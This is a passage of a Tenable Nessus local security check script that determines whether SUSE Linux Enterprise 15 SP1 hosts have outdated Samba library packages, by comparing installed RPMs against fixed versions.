value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy-python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy0-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy0-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-ad-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-ad-dc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-dsdb-modules-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-libs-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libdcerpc-binding0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libdcerpc-binding0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libdcerpc-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libdcerpc-samr-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libdcerpc-samr0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libdcerpc-samr0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libdcerpc0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libdcerpc0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-krb5pac-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-krb5pac0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-krb5pac0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-nbt-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-nbt0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-nbt0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-standard-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-standard0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr-standard0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libndr0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libnetapi-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libnetapi0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libnetapi0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-credentials-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-credentials0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-credentials0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-errors-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-errors0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-errors0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-hostconfig-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-hostconfig0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-hostconfig0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-passdb-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-passdb0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-passdb0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-policy-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-policy-python3-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-policy0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-policy0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-policy0-python3-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-policy0-python3-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-util-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-util0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamba-util0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamdb-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamdb0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsamdb0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsmbclient-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsmbclient0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsmbclient0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsmbconf-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsmbconf0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsmbconf0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsmbldap-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsmbldap2-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libsmbldap2-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libtevent-util-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libtevent-util0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libtevent-util0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libwbclient-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libwbclient0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"libwbclient0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-ad-dc-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-ad-dc-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", 